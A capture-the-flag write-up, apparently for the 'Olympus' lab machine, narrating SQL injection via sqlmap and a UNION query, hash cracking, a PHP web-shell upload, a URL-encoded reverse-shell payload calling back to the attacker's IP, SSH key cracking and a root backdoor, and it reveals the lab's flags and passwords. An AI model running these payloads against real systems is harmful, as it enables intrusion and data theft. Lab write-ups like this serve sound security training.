Target IP: 10.10.83.153
I added 10.10.83.153 olympus.thm vhost inside the /etc/hosts file and now we are ready to go!
Only two ports are open on the machine: SSH and HTTP. I will start my enumeration with the HTTP first.
Port 80: HTTP
Heading to olympus.thm shows us the webpage above. There is a hint The old version of the website is still accessible on this domain. Viewing the source code of this page did not provide any useful information. Time for a directory search!
Doing a simple directory search gives us a plenty of information. The result /~webmaster looks interesting.
The webpage above is displayed to us when we browse to this directory. It looks like this is the first version of the website.
Viewing the source code the webpage mentions it is Simple Content Management System by Victor Alagwu. Doing a Google search shows this application version is vulnerable to SQL injection. However, it seems the old website used a parameter for categories of topics. This paramter could be vulnerable.
It looks like the cat_id parameter is vulnerable according to sqlmap. I used the command sqlmap -u "http://olympus.thm/~webmaster/category.php?cat_id=1" --dump to dump all the tables.
By dumping the contents of the tables, I got a bunch of useful information. The interesting part is prometheus is not using any randsalt (random salt) to their password.
I copied the password hash of each user in a text file called hash.
Then I used john to crack the hashes. It managed to crack the hash of one user, possibly prometheus. Now we have a login credential of prometheus:summertime we can spray at the old website login page and the SSH.
The login credential above worked for the admin page for the old website. However, checking the users page shows prometheus only has User role and we need to obtain the admin privileges. We have the option to create a new user, but we are unable to login as them.
It looks like we can change our profile picture for our account. Maybe we can use file upload exploit? When the Browse... button is pressed, it shows all formats are accepted. Changing to a php file is also accepted (wtf)? Now the next step is to find out where our profile picture is stored. It looks like it gets stored in the /img/<name> directory. Only problem is we need admin privileges to access our backdoor.
I added another virtual host called chat.olympus.thm.
After performing a directory search on the new virtual host, I gained more information. The /uploads is interesting because chat information are stored in this directory. From the database dump above, there was an interesting file called 47c3210d51761686f3af40a875eeaaea.txt.
But this file shows nothing useful.
Using the command curl http://olympus.thm/~webmaster/search.php -d "search=' union select 1,2,group_concat(file),4,5,6,7,8,9,10 from chats-- -&submit=", I was able to obtain the uploaded files.
And I was able to access my simple web shell.
Now I have a simple web shell. I leveraged this to gain a reverse shell connection. I used the PHP payload below, and visited the URL to activate it. And now I have a foothold on the machine.
Payload used: php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
Full URL: http://chat.olympus.thm/uploads/3573b47dffe7988a0b3e548986a5b3ab.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.
My machine timed out, so the new full URL is http://chat.olympus.thm/uploads/03c049b49938dbe1761d94312d63f02f.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
New IP is 10.10.56.116.
There is an unusual binary called cputils. Running it enables us to copy a file from a source to a destination.
Looks like zeus has .ssh key.
Now I have the SSH key of user zeus.
However, it is asking for the passphrase.
I used ssh2john to obtain the hash of the key. And then using john, I cracked the passphrase of the SSH key. Now I can login as the user zeus. The passphrase is snowflake.
And I am in as zeus.
During further manual enumeration, I found an interesting file that looks like a backdoor with a password inside it. Therefore, the file should work 0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php.
And it did! I used the password that is inside the php file to gain access. This is a backdoor that gives us root privileges. The syntax command is already there too!
Using the secret backdoor, I managed to obtain a root shell!
Command I used is http://10.10.56.116/0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php?ip=10.14.55.153&port=8444 to point to my local machine and port. I had to enter the password again.
Using sqlmap, I dumped the table olympus.flag. This table contains the first flag.
I obtained the second flag. It was inside zeus home directory.
The root.txt flag once I used the secret backdoor to gain a reverse shell connection.
The fourth flag requires us to search for it. Using grep -r flag{ should be enough to obtain the last flag file.
The last flag is located at /etc/ssl/private/.bonus.fl4g which is flag{Y0u_G0t_m3_g00d!}.